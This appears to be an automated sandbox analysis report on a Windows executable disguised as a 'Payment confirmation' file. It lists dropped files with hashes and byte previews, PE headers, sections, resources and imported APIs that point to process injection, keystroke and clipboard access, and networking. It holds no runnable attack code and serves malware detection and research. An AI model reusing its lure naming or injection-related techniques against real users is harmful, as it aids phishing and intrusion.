                                        Process:C:\Users\user\Desktop\Payment confirmation 20240911.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):288768
                                        Entropy (8bit):7.993862746080312
                                        Encrypted:true
                                        SSDEEP:6144:dDwh81eZWKAucoKw5xEw0Yh8xDkP90E2MzgAGy:dchFBAjoKwD0YhoDkP/Dso
                                        MD5:2DB554BF84EE0751D2503BEC8EEED7B3
                                        SHA1:027619A76D49CE5F7E9D83CC181EAD8BC30CBDBC
                                        SHA-256:7B26E47F37165F960068526A4E2DCC2C49C6942E969BE4FE4D2E5700A8F8C65B
                                        SHA-512:572AB89F1961DD2716FD8AB83C6D5775860FBD3EF16ECB70A979D260E4DA2F7E6E37857BB4B3F663B83B4504B82397206F23BE5AD1FBE2010854C03EB2791468
                                        Malicious:false
                                        Reputation:low
                                        Preview:.....2YXG`..O...l.81...H=...YMPN82YXG8K5FN4YMPN82YXG8K5FN4.MPN6-.VG.B.g.5..q.P[*x7J$R4/Yy.1 V]-x%]kG3 .0#p.way5(\..KC>}MPN82YX>9B.{.S.p0)..9?.".tT>.J..e8 .Q...9*..QQ1e'_.5FN4YMPNhwYX.9J5..O;MPN82YXG.K7GE5RMP.<2YXG8K5FNdMMPN(2YX7<K5F.4Y]PN80YXA8K5FN4YKPN82YXG8;1FN6YMPN82[X..K5VN4IMPN8"YXW8K5FN4IMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5h:Q!9PN8..\G8[5FNb]MP^82YXG8K5FN4YMPn829XG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8

                                        C:\Users\user\AppData\Local\Temp\n6jtxj_h.zip

                                        Download File
                                        Process:C:\Windows\SysWOW64\RMActivate_ssp.exe
                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                        Category:dropped
                                        Size (bytes):449193
                                        Entropy (8bit):7.998501123969788
                                        Encrypted:true
                                        SSDEEP:6144:jXoz9So1ux9eAuKRsdDe3ORuIlYrKwVyVLndNNXe24i8vCVrlWswlaWpgoeOmg1x:0/1ubzuEkRuIerXpCVrlVEHbLv
                                        MD5:9EC4D0FE38CB4DE94D578BFD72C8EEBD
                                        SHA1:E316282A617C5F0C40C488DE79C73CF13C8BAAF2
                                        SHA-256:2402C65692D0A822D7931489D1BBF29FA9BFBF210819C1614DD8D2350E747F2F
                                        SHA-512:A3D1FF3C516CF2C6548E03D68EEAFF530ACC794E1F76253D46B092183BD762C1126160DD611E0D3CEEC5D0664D946E5D154B8DC88B1BCCF606B57CFD59A31201
                                        Malicious:false
                                        Reputation:low
                                        Preview:PK........y.7L......../.......sqlite3.defUT....4fZ.4fZux.........d.......(...y.d....r.Tv.{sa,......=3O.......>..B............*..$...&.L....T...1..?..5.<....iUF.KO....b.>sU8...0[.....Y.Y.y$..p..8k.L.u+...5'.pb....I.D..)...t....!;....:....[....}u.t....#..Hj.#{...Xz2~us..C..L.a.M..`P;..| .......96b.. \.&...t.Y.....Z...N.`......nx(..s$..x.P..".Y..,h...H.>.qX.'#x.T.F.x.Txf.e.M.. .q.nW...iNF.D"....o.d.v.U...Qv(....c..D.=.....`..*......i.k.4.&^..5F.*..eA.....|..9.l.K.M..~............fI.;...f.1:....).K)\.....`r.[.4>..[Z.|..7.A..hE.Hm.rR..._p.R6.t.I.0y.['..#.Nx.I..7.K .P9......]..G...l.N..1.&...>......T} L.\.Kbu.=..c.`,.B.y.^.........G[A...{par...?..q6v^.aO..d-...O.[.v~....N$...$0...^.v...)T.+-..p.k.=.D...3"3`=Ha......,..1.F..7... .$z.H..z.c."k..9g'...p.-..2Y.A.z.....;..M9@el............~.U&q.........f-.K.cke.]..b.Xw..o).X.a.cq;.`.Ljy.....t.W.w...8.{.b.%.6n...t........R.WT8........E..q!......x...:...g..K...>...I-N.y.....{k..5...7]..v.......{....

                                        C:\Users\user\AppData\Local\Temp\springmaker

                                        Download File
                                        Process:C:\Users\user\Desktop\Payment confirmation 20240911.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):288768
                                        Entropy (8bit):7.993862746080312
                                        Encrypted:true
                                        SSDEEP:6144:dDwh81eZWKAucoKw5xEw0Yh8xDkP90E2MzgAGy:dchFBAjoKwD0YhoDkP/Dso
                                        MD5:2DB554BF84EE0751D2503BEC8EEED7B3
                                        SHA1:027619A76D49CE5F7E9D83CC181EAD8BC30CBDBC
                                        SHA-256:7B26E47F37165F960068526A4E2DCC2C49C6942E969BE4FE4D2E5700A8F8C65B
                                        SHA-512:572AB89F1961DD2716FD8AB83C6D5775860FBD3EF16ECB70A979D260E4DA2F7E6E37857BB4B3F663B83B4504B82397206F23BE5AD1FBE2010854C03EB2791468
                                        Malicious:false
                                        Preview:.....2YXG`..O...l.81...H=...YMPN82YXG8K5FN4YMPN82YXG8K5FN4.MPN6-.VG.B.g.5..q.P[*x7J$R4/Yy.1 V]-x%]kG3 .0#p.way5(\..KC>}MPN82YX>9B.{.S.p0)..9?.".tT>.J..e8 .Q...9*..QQ1e'_.5FN4YMPNhwYX.9J5..O;MPN82YXG.K7GE5RMP.<2YXG8K5FNdMMPN(2YX7<K5F.4Y]PN80YXA8K5FN4YKPN82YXG8;1FN6YMPN82[X..K5VN4IMPN8"YXW8K5FN4IMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5h:Q!9PN8..\G8[5FNb]MP^82YXG8K5FN4YMPn829XG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8K5FN4YMPN82YXG8

                                        C:\Users\user\AppData\Local\Temp\sqlite3.def

                                        Download File
                                        Process:C:\Windows\SysWOW64\RMActivate_ssp.exe
                                        File Type:ASCII text
                                        Category:dropped
                                        Size (bytes):5167
                                        Entropy (8bit):4.34771473123006
                                        Encrypted:false
                                        SSDEEP:96:GcuN/gR+7Oc0XRMcCM3KOGOF++BlMtvrENw+Y0ac:E/Q+7Oc0JKOBF++EvrENw+cc
                                        MD5:CD9B704B328573406D319F6E22E043BE
                                        SHA1:FB88536357CF2A7DB522684887AFFD85AB5747DA
                                        SHA-256:8274A340B59D469C27EB238A7984D250287C7820556A9E2693E8F1ECD907936A
                                        SHA-512:869AC4A65380EC36254DE7309D84D5C98D4B280E71BDCC389F4689BC140EF86EA0EB3E736CB7E906417E40EBA79C33DD712CF67099AE26FFEECFF78130E2CA29
                                        Malicious:false
                                        Preview:EXPORTS.sqlite3_aggregate_context.sqlite3_aggregate_count.sqlite3_auto_extension.sqlite3_backup_finish.sqlite3_backup_init.sqlite3_backup_pagecount.sqlite3_backup_remaining.sqlite3_backup_step.sqlite3_bind_blob.sqlite3_bind_blob64.sqlite3_bind_double.sqlite3_bind_int.sqlite3_bind_int64.sqlite3_bind_null.sqlite3_bind_parameter_count.sqlite3_bind_parameter_index.sqlite3_bind_parameter_name.sqlite3_bind_pointer.sqlite3_bind_text.sqlite3_bind_text16.sqlite3_bind_text64.sqlite3_bind_value.sqlite3_bind_zeroblob.sqlite3_bind_zeroblob64.sqlite3_blob_bytes.sqlite3_blob_close.sqlite3_blob_open.sqlite3_blob_read.sqlite3_blob_reopen.sqlite3_blob_write.sqlite3_busy_handler.sqlite3_busy_timeout.sqlite3_cancel_auto_extension.sqlite3_changes.sqlite3_clear_bindings.sqlite3_close.sqlite3_close_v2.sqlite3_collation_needed.sqlite3_collation_needed16.sqlite3_column_blob.sqlite3_column_bytes.sqlite3_column_bytes16.sqlite3_column_count.sqlite3_column_database_name.sqlite3_column_database_name16.sqlite3_colum

                                        C:\Users\user\AppData\Local\Temp\sqlite3.dll

                                        Download File
                                        Process:C:\Windows\SysWOW64\RMActivate_ssp.exe
                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):858084
                                        Entropy (8bit):6.509766799598966
                                        Encrypted:false
                                        SSDEEP:24576:ATtmtnhKqK75YJ4+X8NLXBIXcgVMU//GV:Ashc84y8NLXBUjQ
                                        MD5:E1B58E0AA1B377A1D0E940660AD1ACE1
                                        SHA1:5AFC7291B26855B1252B26381EBC85ED3CCA218F
                                        SHA-256:1B98C006231D38524E2278A474C49274FE42E0BB1A31BCFDA02E6E32F559B777
                                        SHA-512:9CE778BCB586638662B090910C4CEAB3B64E16DFAF905A7581C1D349FECDF186995B3CC0DC8C6FC6E9761EA2831D7B14AC1619C2BD5EBC6D18015842E5D94AA2
                                        Malicious:false
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Joe Sandbox View:
                                        • Filename: MDE_File_Sample_057ab3b6c65fb3b21b39c980be830b1c0670eb86.zip, Detection: malicious, Browse
                                        • Filename: ORDEN DE COMPRAs#U034fx#U034fl#U034fx#U034f..exe, Detection: malicious, Browse
                                        • Filename: TT swift copy.xls, Detection: malicious, Browse
                                        • Filename: AAC2FF3E-3614-4614-ADAD-F2688E62FB4.doc, Detection: malicious, Browse
                                        • Filename: 009c487a.exe, Detection: malicious, Browse
                                        • Filename: f1.f1.f1.doc, Detection: malicious, Browse
                                        • Filename: 0167.doc.scr, Detection: malicious, Browse
                                        • Filename: SWIFT-EUR 38650_06122022.xls, Detection: malicious, Browse
                                        • Filename: PEK-AE-2210002.xls, Detection: malicious, Browse
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....4fZ.>.........!.........2.....................a.................................M........ .........................[.... ..0....P.......................`...0...........................@.......................!...............................text...............................`.P`.data...............................@.`..rdata..............................@.`@.bss..................................`..edata..[........ ..................@.0@.idata..0.... ......................@.0..CRT....,....0......................@.0..tls.... ....@......................@.0..rsrc........P......................@.0..reloc...0...`...2..................@.0B/4...................8..............@.@B/19.................<..............@..B/31..........P......................@..B/45..........p......................@..B/57.................................@.0B/70.....i...............

                                        Static File Info

                                        General

                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Entropy (8bit):7.147381943730137
                                        TrID:
                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                        • DOS Executable Generic (2002/1) 0.02%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:Payment confirmation 20240911.exe
                                        File size:1'211'392 bytes
                                        MD5:fce0847be56787ed350b9aa76990d91d
                                        SHA1:5c3d8ca6e50e763b87244d7b9e84eab52ad6464f
                                        SHA256:f5be3462bef54d4bd79a337ab058dd1663c0a3d23a27f1c7573dde13893c8db2
                                        SHA512:54a8e3b03bb72dadce15d00b0236bd1f707e943acd9729f0b070ecf16a3f61441ab425ab37e4c9b6ce11a12d7162cb0b6132dbd68865d9076ce85a4d471ac64a
                                        SSDEEP:24576:34lavt0LkLL9IMixoEgeaWOAaqiO1pD6gUAJJNzq9MmCS:Skwkn9IMHeaWJH1h5PxaPCS
                                        TLSH:FA45DF0373DE83A5C3725233BA65BB01AEBB7C2509A1F59B2FD5093DF920162521E673
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S................g..........$...............%.....H.......X.2...........q)..Z...q)......q)........\.....q)......Rich...........

                                        File Icon

                                        Icon Hash:aaf3e3e3938382a0

                                        Static PE Info

                                        General

                                        Entrypoint:0x426bf7
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x66E0D9A3 [Tue Sep 10 23:43:31 2024 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:5
                                        OS Version Minor:1
                                        File Version Major:5
                                        File Version Minor:1
                                        Subsystem Version Major:5
                                        Subsystem Version Minor:1
                                        Import Hash:bbac62fd99326ea68ec5a33b36925dd1

                                        Entrypoint Preview

                                        Instruction
                                        call 00007F4348DA2A5Ch
                                        jmp 00007F4348D95944h
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        push edi
                                        push esi
                                        mov esi, dword ptr [esp+10h]
                                        mov ecx, dword ptr [esp+14h]
                                        mov edi, dword ptr [esp+0Ch]
                                        mov eax, ecx
                                        mov edx, ecx
                                        add eax, esi
                                        cmp edi, esi
                                        jbe 00007F4348D95ACAh
                                        cmp edi, eax
                                        jc 00007F4348D95E2Eh
                                        bt dword ptr [004C0158h], 01h
                                        jnc 00007F4348D95AC9h
                                        rep movsb
                                        jmp 00007F4348D95DDCh
                                        cmp ecx, 00000080h
                                        jc 00007F4348D95C94h
                                        mov eax, edi
                                        xor eax, esi
                                        test eax, 0000000Fh
                                        jne 00007F4348D95AD0h
                                        bt dword ptr [004BA370h], 01h
                                        jc 00007F4348D95FA0h
                                        bt dword ptr [004C0158h], 00000000h
                                        jnc 00007F4348D95C6Dh
                                        test edi, 00000003h
                                        jne 00007F4348D95C7Eh
                                        test esi, 00000003h
                                        jne 00007F4348D95C5Dh
                                        bt edi, 02h
                                        jnc 00007F4348D95ACFh
                                        mov eax, dword ptr [esi]
                                        sub ecx, 04h
                                        lea esi, dword ptr [esi+04h]
                                        mov dword ptr [edi], eax
                                        lea edi, dword ptr [edi+04h]
                                        bt edi, 03h
                                        jnc 00007F4348D95AD3h
                                        movq xmm1, qword ptr [esi]
                                        sub ecx, 08h
                                        lea esi, dword ptr [esi+08h]
                                        movq qword ptr [edi], xmm1
                                        lea edi, dword ptr [edi+08h]
                                        test esi, 00000007h
                                        je 00007F4348D95B25h

                                        Rich Headers

                                        Programming Language:
                                        • [ C ] VS2008 SP1 build 30729
                                        • [IMP] VS2008 SP1 build 30729
                                        • [ASM] VS2012 UPD4 build 61030
                                        • [RES] VS2012 UPD4 build 61030
                                        • [LNK] VS2012 UPD4 build 61030

                                        Data Directories

                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xb6b6c0x17c.rdata
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000x5e670.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x1230000x6c20.reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x8d8d00x1c.rdata
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb27700x40.rdata
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x8d0000x858.rdata
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                        Sections

                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x10000x8be740x8c00074af66fa540568c59b3868e78900e476False0.5690970284598215data6.681489717174931IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .rdata0x8d0000x2c76a0x2c800576c856afaad699ad9fe099fc6a9ce33False0.33122476299157305zlib compressed data5.781163507108141IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .data0xba0000x9f340x6200e6d2e204147f7cdc3055011093632f54False0.1639030612244898data2.004392861291539IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .rsrc0xc40000x5e6700x5e800530de5e799b589e39ec78e3fe84adf13False0.930165447255291data7.900329964453995IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc0x1230000xa4620xa600c2f6ddaeef894b7510c3be928eeae5ddFalse0.5080948795180723data5.238496692777452IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                        Resources

                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                        RT_ICON0xc45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                        RT_ICON0xc46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                        RT_ICON0xc47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                        RT_ICON0xc49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                        RT_ICON0xc4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                        RT_ICON0xc4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                        RT_ICON0xc5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                        RT_ICON0xc64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                        RT_ICON0xc69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                        RT_ICON0xc8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                        RT_ICON0xca0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                        RT_MENU0xca4a00x50dataEnglishGreat Britain0.9
                                        RT_STRING0xca4f00x594dataEnglishGreat Britain0.3333333333333333
                                        RT_STRING0xcaa840x68adataEnglishGreat Britain0.2747909199522103
                                        RT_STRING0xcb1100x490dataEnglishGreat Britain0.3715753424657534
                                        RT_STRING0xcb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                        RT_STRING0xcbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                        RT_STRING0xcc1f80x466dataEnglishGreat Britain0.3605683836589698
                                        RT_STRING0xcc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                        RT_RCDATA0xcc7b80x55975data1.0003308793117711
                                        RT_GROUP_ICON0x1221300x76dataEnglishGreat Britain0.6610169491525424
                                        RT_GROUP_ICON0x1221a80x14dataEnglishGreat Britain1.25
                                        RT_GROUP_ICON0x1221bc0x14dataEnglishGreat Britain1.15
                                        RT_GROUP_ICON0x1221d00x14dataEnglishGreat Britain1.25
                                        RT_VERSION0x1221e40xdcdataEnglishGreat Britain0.6181818181818182
                                        RT_MANIFEST0x1222c00x3b0ASCII text, with CRLF line terminatorsEnglishGreat Britain0.5116525423728814

                                        Imports

                                        DLLImport
                                        WSOCK32.dll__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
                                        VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                        WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                        COMCTL32.dllImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
                                        MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                        WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
                                        PSAPI.DLLGetProcessMemoryInfo
                                        IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                        USERENV.dllUnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
                                        UxTheme.dllIsThemeActive
                                        KERNEL32.dllWaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, CloseHandle, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, CreateThread, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, GetLastError, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, DuplicateHandle, GetCurrentProcess, EnterCriticalSection, GetCurrentThread, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, FindNextFileW, SetEnvironmentVariableA
                                        USER32.dllCopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, AdjustWindowRectEx, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, UnregisterHotKey, SystemParametersInfoW, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, GetCursorPos, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, FindWindowW, CharLowerBuffW, GetWindowTextW
                                        GDI32.dllSetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
                                        COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                        ADVAPI32.dllGetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
